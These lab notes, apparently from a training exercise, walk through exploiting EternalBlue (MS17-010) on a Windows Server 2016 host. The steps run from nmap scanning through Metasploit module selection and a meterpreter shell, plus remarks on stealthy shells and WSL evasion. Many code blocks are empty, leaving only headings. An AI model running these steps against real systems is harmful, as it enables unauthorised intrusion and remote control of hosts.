🛠️ MS17-010 EternalBlue
🔎 1. Enumerate the Host
Use nmap
to discover open ports and services:
Findings:
Open Ports: 80 (IIS 10.0), 135 (RPC), 139 (NetBIOS), 445 (SMB)
Host OS: Windows Server 2016 Standard 14393
Hostname: SHELLS-WINBLUE
Workgroup: WORKGROUP
🎯 2. Search for Vulnerability (MS17-010 EternalBlue)
Use Metasploit to identify if the host is vulnerable:
Result:
💥 3. Choose & Configure Exploit + Payload
Search for EternalBlue exploits:
Choose:
Set exploit options:
Optional (not used here but useful):
🚀 4. Execute Exploit
Success Output:
💻 5. Post-Exploitation Access
Check user privileges:
Drop into system shell:
Expected output:
🧠 Understanding Windows Shells
Lightweight and legacy shell
Modern shell with .NET support
Minimal tracing/logging
Keeps command history (less stealthy)
Fewer capabilities
Supports complex scripts, cmdlets, objects
Present on older systems (pre-Win7)
Only present from Windows 7 onward
Works well with .bat files
Best for advanced automation or interacting with APIs
Tip: Use help
or observe prompt:
C:\>
→ CMDPS C:\>
→ PowerShell
🐧 WSL and PowerShell for Linux (⚠️ Advanced Topics)
WSL (Windows Subsystem for Linux):
Enables running Linux binaries on Windows.
Some malware uses WSL to install payloads.
WSL network traffic may bypass Windows Firewall/Defender.
PowerShell Core on Linux:
Provides cross-platform shell functionality.
Could be abused for stealthy attacks on hybrid environments.
💡 Summary: Tools Used
Tools:
nmap
– Scanning & banner grabbingmsfconsole
– Exploitation & payload deliverymeterpreter
– Post-exploitation shellWindows Shells:
cmd.exe
andpowershell.exe
Commands Summary:
Scan with Nmap
nmap -v -A <target-ip>
Banner grabbing
nmap -v --script banner.nse <target-ip>
Launch Metasploit
msfconsole
Search EternalBlue
search eternal
Set exploit module
use exploit/windows/smb/ms17_010_psexec
Configure exploit
set RHOSTS <target-ip>
, set LHOST
, set LPORT
Run the exploit
exploit
Meterpreter commands
getuid
, shell
Would you like a PDF version of these notes or another format?
Last updated